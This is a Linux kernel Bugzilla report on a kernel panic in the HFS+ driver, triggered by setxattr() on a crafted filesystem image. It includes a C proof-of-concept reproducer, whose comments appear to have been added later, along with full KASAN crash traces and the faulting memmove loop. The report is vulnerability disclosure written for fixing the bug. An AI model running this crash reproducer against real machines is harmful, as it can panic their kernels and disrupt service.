Bug 200289 - Kernel panic when calling setxattr() on a corrupted hfs+ image
Summary: Kernel panic when calling setxattr() on a corrupted hfs+ image
Status: NEW
Alias: None
Product: File System
Classification: Unclassified
Component: HFS/HFSPLUS (show other bugs)
Hardware: All Linux
: P1 normal
Assignee: fs_hfs@kernel-bugs.osdl.org
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2018-06-27 03:41 UTC by Wen Xu
Modified: 2018-06-27 03:41 UTC (History)
1 user (show)

See Also:
Kernel Version: 4.18
Subsystem:
Regression: No
Bisected commit-id:


Attachments
The (compressed) crafted image which causes crash (4.00 MB, application/octet-stream)
2018-06-27 03:41 UTC, Wen Xu

Description Wen Xu 2018-06-27 03:41:04 UTC
Created attachment 276891 [details]
The (compressed) crafted image which causes crash

- Reproduce
# mkdir mnt
# mount -t hfsplus 81.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>

#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <linux/falloc.h>
#include <linux/loop.h>

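static void activity(char *mpoint) {
  /*
   * Build the path "<mpoint>/foo/bar/xattr" and issue the xattr call
   * sequence from the report against it: listxattr, removexattr, then
   * setxattr with XATTR_CREATE and XATTR_REPLACE. The syscall results are
   * deliberately left unchecked, as in the original reproducer; only the
   * path construction is validated here.
   *
   * mpoint: mount point of the image, supplied by the caller (never NULL).
   */
  char *xattr = NULL;

  // asprintf() leaves xattr undefined on failure, so stop here rather than
  // hand an indeterminate pointer to the xattr syscalls. (The original
  // stored the return value in `err` but never looked at it.)
  if (asprintf(&xattr, "%s/foo/bar/xattr", mpoint) < 0) {
    return;
  }

  // xattr value buffer: zeroed first; listxattr() may then overwrite it with
  // attribute names, and whatever it holds afterwards is stored as user.md5.
  char buf2[113];
  memset(buf2, 0, sizeof(buf2));
  listxattr(xattr, buf2, sizeof(buf2));
  removexattr(xattr, "user.mime_type");
  setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_CREATE);
  setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_REPLACE);

  // asprintf() allocated the path; release it (the original leaked it).
  free(xattr);
}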

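int main(int argc, char *argv[]) {
  /*
   * Entry point: argv[1] is the mount point of the hfsplus image to test.
   * Returns 0 after running the reproducer, 1 on a missing argument.
   */
  // The original passed argv[1] straight through; with no argument that is
  // a NULL pointer fed to asprintf("%s"), which is undefined behaviour.
  if (argc < 2 || argv[1] == NULL) {
    fprintf(stderr, "usage: %s <mountpoint>\n", argv[0]);
    return 1;
  }
  activity(argv[1]);
  return 0;
}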

- Kernel message
[  178.302459] ==================================================================
[  178.304073] BUG: KASAN: wild-memory-access in hfsplus_bnode_move+0x1a4/0x660
[  178.305510] Read of size 18446744073709551602 at addr 000508000000100e by task a.out/1364

[  178.307485] CPU: 0 PID: 1364 Comm: a.out Not tainted 4.18.0-rc1+ #6
[  178.307488] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  178.307494] Call Trace:
[  178.307532]  dump_stack+0x7b/0xb5
[  178.307568]  kasan_report+0x10c/0x390
[  178.307573]  ? hfsplus_bnode_move+0x1a4/0x660
[  178.307590]  check_memory_region+0x139/0x190
[  178.307595]  memmove+0x23/0x50
[  178.307600]  hfsplus_bnode_move+0x1a4/0x660
[  178.307606]  hfsplus_brec_insert+0x371/0x6c0
[  178.307612]  ? hfsplus_brec_keylen+0x130/0x130
[  178.307617]  ? __kmalloc+0x11f/0x240
[  178.307623]  hfsplus_create_attr+0x263/0x2b0
[  178.307628]  ? hfsplus_attr_exists+0x140/0x140
[  178.307636]  ? strncmp+0x3d/0xc0
[  178.307641]  __hfsplus_setxattr+0x2d5/0x1160
[  178.307672]  ? unwind_get_return_address+0x36/0x50
[  178.307678]  ? kasan_check_write+0x14/0x20
[  178.307693]  ? _raw_spin_lock_irqsave+0x2a/0x60
[  178.307700]  ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280
[  178.307705]  ? save_stack+0x46/0xd0
[  178.307708]  ? kasan_kmalloc+0xad/0xe0
[  178.307712]  ? kmem_cache_alloc_trace+0x102/0x200
[  178.307717]  ? hfsplus_setxattr+0x4c/0xb0
[  178.307720]  ? hfsplus_user_setxattr+0x27/0x30
[  178.307733]  ? __vfs_setxattr+0x7c/0xa0
[  178.307738]  ? __vfs_setxattr_noperm+0x8d/0x200
[  178.307741]  ? vfs_setxattr+0xb3/0xc0
[  178.307745]  ? setxattr+0x1b3/0x260
[  178.307748]  ? path_setxattr+0x134/0x170
[  178.307752]  ? __x64_sys_setxattr+0x6d/0x80
[  178.307766]  ? do_syscall_64+0x78/0x170
[  178.307771]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  178.307777]  ? save_stack+0xb5/0xd0
[  178.307780]  ? save_stack+0x46/0xd0
[  178.307783]  ? kasan_kmalloc+0xad/0xe0
[  178.307791]  ? __kmalloc_node+0x11e/0x2e0
[  178.307807]  ? kvmalloc_node+0x31/0x80
[  178.307811]  ? setxattr+0x114/0x260
[  178.307815]  ? path_setxattr+0x134/0x170
[  178.307819]  ? __x64_sys_setxattr+0x6d/0x80
[  178.307822]  ? do_syscall_64+0x78/0x170
[  178.307827]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  178.307831]  ? save_stack+0xb5/0xd0
[  178.307834]  ? save_stack+0x46/0xd0
[  178.307838]  ? __kasan_slab_free+0x13c/0x1a0
[  178.307841]  ? kasan_slab_free+0xe/0x10
[  178.307845]  ? kmem_cache_free+0x89/0x1e0
[  178.307854]  ? putname+0x80/0x90
[  178.307858]  ? filename_lookup+0x191/0x280
[  178.307862]  ? kasan_unpoison_shadow+0x36/0x50
[  178.307866]  ? kasan_kmalloc+0xad/0xe0
[  178.307871]  ? kmem_cache_alloc_trace+0x102/0x200
[  178.307877]  hfsplus_setxattr+0x8a/0xb0
[  178.307881]  hfsplus_user_setxattr+0x27/0x30
[  178.307885]  __vfs_setxattr+0x7c/0xa0
[  178.307890]  __vfs_setxattr_noperm+0x8d/0x200
[  178.307894]  vfs_setxattr+0xb3/0xc0
[  178.307898]  setxattr+0x1b3/0x260
[  178.307902]  ? vfs_setxattr+0xc0/0xc0
[  178.307906]  ? filename_lookup+0x191/0x280
[  178.307910]  ? filename_parentat+0x2b0/0x2b0
[  178.307914]  ? kasan_kmalloc+0xad/0xe0
[  178.307919]  ? kasan_check_write+0x14/0x20
[  178.307942]  ? strncpy_from_user+0xa8/0x1c0
[  178.307954]  ? __mnt_is_readonly.part.13+0x23/0x30
[  178.307960]  ? __mnt_want_write+0x9d/0xb0
[  178.307964]  path_setxattr+0x134/0x170
[  178.307969]  ? setxattr+0x260/0x260
[  178.307978]  ? vm_brk+0x20/0x20
[  178.307984]  __x64_sys_setxattr+0x6d/0x80
[  178.307988]  do_syscall_64+0x78/0x170
[  178.307994]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  178.308016] RIP: 0033:0x7f73a2b2c1fa
[  178.308017] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48
[  178.308078] RSP: 002b:00007fffa19f7418 EFLAGS: 00000206 ORIG_RAX: 00000000000000bc
[  178.308087] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f73a2b2c1fa
[  178.308090] RDX: 00007fffa19f7440 RSI: 00000000004008a4 RDI: 0000000001389080
[  178.308092] RBP: 00007fffa19f74c0 R08: 0000000000000001 R09: 0000000000000000
[  178.308095] R10: 0000000000000071 R11: 0000000000000206 R12: 00000000004005e0
[  178.308097] R13: 00007fffa19f75c0 R14: 0000000000000000 R15: 0000000000000000
[  178.308102] ==================================================================
[  178.309572] Disabling lock debugging due to kernel taint
[  178.309830] general protection fault: 0000 [#1] SMP KASAN PTI
[  178.311012] CPU: 0 PID: 1364 Comm: a.out Tainted: G    B             4.18.0-rc1+ #6
[  178.312569] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  178.314462] RIP: 0010:__memmove+0x3d/0x1a0
[  178.315292] Code: 89 f0 49 01 d0 49 39 f8 0f 8f 9f 00 00 00 66 66 90 66 66 90 48 81 fa a8 02 00 00 72 05 40 38 fe 74 3b 48 83 ea 20 48 83 ea 20 <4c> 8b 1e 4c 8b 56 08 4c 8b 4e 10 4c 8b 46 18 48 8d 76 20 4c 89 1f
[  178.319037] RSP: 0018:ffff8801f243f528 EFLAGS: 00010286
[  178.320083] RAX: ffff8801d19420ae RBX: fffffffffffffff2 RCX: ffffffffad5b3a54
[  178.322245] RDX: ffffffffffffffb2 RSI: 000508000000100e RDI: ffff8801d19420ae
[  178.323686] RBP: ffff8801f243f548 R08: ffffed003a337e01 R09: ffffed003a328414
[  178.325139] R10: ffffffffffffffff R11: ffffed003a328413 R12: ffff8801d19420ae
[  178.326571] R13: 000508000000100e R14: ffff8801e04b9350 R15: ffff8801e04b9348
[  178.328004] FS:  00007f73a300b700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  178.329647] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  178.330809] CR2: 0000000001389008 CR3: 00000001e58ca000 CR4: 00000000000006f0
[  178.341180] Call Trace:
[  178.342118]  ? memmove+0x45/0x50
[  178.343186]  hfsplus_bnode_move+0x1a4/0x660
[  178.344051]  hfsplus_brec_insert+0x371/0x6c0
[  178.344946]  ? hfsplus_brec_keylen+0x130/0x130
[  178.345858]  ? __kmalloc+0x11f/0x240
[  178.346609]  hfsplus_create_attr+0x263/0x2b0
[  178.347488]  ? hfsplus_attr_exists+0x140/0x140
[  178.348418]  ? strncmp+0x3d/0xc0
[  178.349091]  __hfsplus_setxattr+0x2d5/0x1160
[  178.349970]  ? unwind_get_return_address+0x36/0x50
[  178.350952]  ? kasan_check_write+0x14/0x20
[  178.351795]  ? _raw_spin_lock_irqsave+0x2a/0x60
[  178.353173]  ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280
[  178.354364]  ? save_stack+0x46/0xd0
[  178.355088]  ? kasan_kmalloc+0xad/0xe0
[  178.355862]  ? kmem_cache_alloc_trace+0x102/0x200
[  178.356842]  ? hfsplus_setxattr+0x4c/0xb0
[  178.357671]  ? hfsplus_user_setxattr+0x27/0x30
[  178.358845]  ? __vfs_setxattr+0x7c/0xa0
[  178.359639]  ? __vfs_setxattr_noperm+0x8d/0x200
[  178.360683]  ? vfs_setxattr+0xb3/0xc0
[  178.361706]  ? setxattr+0x1b3/0x260
[  178.362432]  ? path_setxattr+0x134/0x170
[  178.363241]  ? __x64_sys_setxattr+0x6d/0x80
[  178.364099]  ? do_syscall_64+0x78/0x170
[  178.365000]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  178.366063]  ? save_stack+0xb5/0xd0
[  178.366786]  ? save_stack+0x46/0xd0
[  178.367503]  ? kasan_kmalloc+0xad/0xe0
[  178.368386]  ? __kmalloc_node+0x11e/0x2e0
[  178.369208]  ? kvmalloc_node+0x31/0x80
[  178.369979]  ? setxattr+0x114/0x260
[  178.370698]  ? path_setxattr+0x134/0x170
[  178.371504]  ? __x64_sys_setxattr+0x6d/0x80
[  178.372472]  ? do_syscall_64+0x78/0x170
[  178.373261]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  178.374318]  ? save_stack+0xb5/0xd0
[  178.375036]  ? save_stack+0x46/0xd0
[  178.375753]  ? __kasan_slab_free+0x13c/0x1a0
[  178.376636]  ? kasan_slab_free+0xe/0x10
[  178.377424]  ? kmem_cache_free+0x89/0x1e0
[  178.378245]  ? putname+0x80/0x90
[  178.378913]  ? filename_lookup+0x191/0x280
[  178.379750]  ? kasan_unpoison_shadow+0x36/0x50
[  178.380762]  ? kasan_kmalloc+0xad/0xe0
[  178.381532]  ? kmem_cache_alloc_trace+0x102/0x200
[  178.382490]  hfsplus_setxattr+0x8a/0xb0
[  178.383276]  hfsplus_user_setxattr+0x27/0x30
[  178.384256]  __vfs_setxattr+0x7c/0xa0
[  178.385009]  __vfs_setxattr_noperm+0x8d/0x200
[  178.385896]  vfs_setxattr+0xb3/0xc0
[  178.386614]  setxattr+0x1b3/0x260
[  178.387296]  ? vfs_setxattr+0xc0/0xc0
[  178.388044]  ? filename_lookup+0x191/0x280
[  178.388894]  ? filename_parentat+0x2b0/0x2b0
[  178.389767]  ? kasan_kmalloc+0xad/0xe0
[  178.390540]  ? kasan_check_write+0x14/0x20
[  178.391379]  ? strncpy_from_user+0xa8/0x1c0
[  178.392250]  ? __mnt_is_readonly.part.13+0x23/0x30
[  178.393228]  ? __mnt_want_write+0x9d/0xb0
[  178.394054]  path_setxattr+0x134/0x170
[  178.394822]  ? setxattr+0x260/0x260
[  178.395543]  ? vm_brk+0x20/0x20
[  178.396207]  __x64_sys_setxattr+0x6d/0x80
[  178.397031]  do_syscall_64+0x78/0x170
[  178.397791]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  178.398820] RIP: 0033:0x7f73a2b2c1fa
[  178.399552] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48
[  178.403344] RSP: 002b:00007fffa19f7418 EFLAGS: 00000206 ORIG_RAX: 00000000000000bc
[  178.404860] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f73a2b2c1fa
[  178.406278] RDX: 00007fffa19f7440 RSI: 00000000004008a4 RDI: 0000000001389080
[  178.407698] RBP: 00007fffa19f74c0 R08: 0000000000000001 R09: 0000000000000000
[  178.409124] R10: 0000000000000071 R11: 0000000000000206 R12: 00000000004005e0
[  178.410533] R13: 00007fffa19f75c0 R14: 0000000000000000 R15: 0000000000000000
[  178.411951] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd i2c_piix4 mac_hid soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper syscopyarea sysfillrect sysimgblt fb_sys_fops crct10dif_pclmul ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy
[  178.421820] ---[ end trace 7f5a46c7478f1295 ]---
[  178.422779] RIP: 0010:__memmove+0x3d/0x1a0
[  178.423609] Code: 89 f0 49 01 d0 49 39 f8 0f 8f 9f 00 00 00 66 66 90 66 66 90 48 81 fa a8 02 00 00 72 05 40 38 fe 74 3b 48 83 ea 20 48 83 ea 20 <4c> 8b 1e 4c 8b 56 08 4c 8b 4e 10 4c 8b 46 18 48 8d 76 20 4c 89 1f
[  178.427440] RSP: 0018:ffff8801f243f528 EFLAGS: 00010286
[  178.428652] RAX: ffff8801d19420ae RBX: fffffffffffffff2 RCX: ffffffffad5b3a54
[  178.430077] RDX: ffffffffffffffb2 RSI: 000508000000100e RDI: ffff8801d19420ae
[  178.431488] RBP: ffff8801f243f548 R08: ffffed003a337e01 R09: ffffed003a328414
[  178.432950] R10: ffffffffffffffff R11: ffffed003a328413 R12: ffff8801d19420ae
[  178.434376] R13: 000508000000100e R14: ffff8801e04b9350 R15: ffff8801e04b9348
[  178.435793] FS:  00007f73a300b700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  178.437444] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  178.438593] CR2: 0000000001389008 CR3: 00000001e58ca000 CR4: 00000000000006f0

- Location
https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/hfsplus/bnode.c#L205
			/*
			 * NOTE(review): the KASAN report above (wild-memory-access in
			 * hfsplus_bnode_move, reached through memmove) points at this
			 * loop. The reported read size 18446744073709551602 equals
			 * (size_t)-14, i.e. the `src` byte count reached memmove()
			 * as a negative value. Neither `src` nor `len` is range-checked
			 * here; presumably they derive from on-disk node/record offsets
			 * of the crafted image -- confirm against the caller in the
			 * trace (hfsplus_brec_insert) and validate both before copying.
			 */
			while (src < len) {
				/* copy `src` bytes from the current source page to the destination page */
				memmove(kmap(*dst_page), kmap(*src_page), src);
				kunmap(*src_page);
				set_page_dirty(*dst_page);
				kunmap(*dst_page);
				len -= src;
				src = PAGE_SIZE;
				src_page--;
				dst_page--;
			}
memmove() reads from a wild address with an out-of-range length (see the KASAN report above: size 18446744073709551602 at addr 000508000000100e), which leads to a kernel panic.

Reported by Wen Xu (wen.xu@gatech.edu) from SSLab at Gatech.
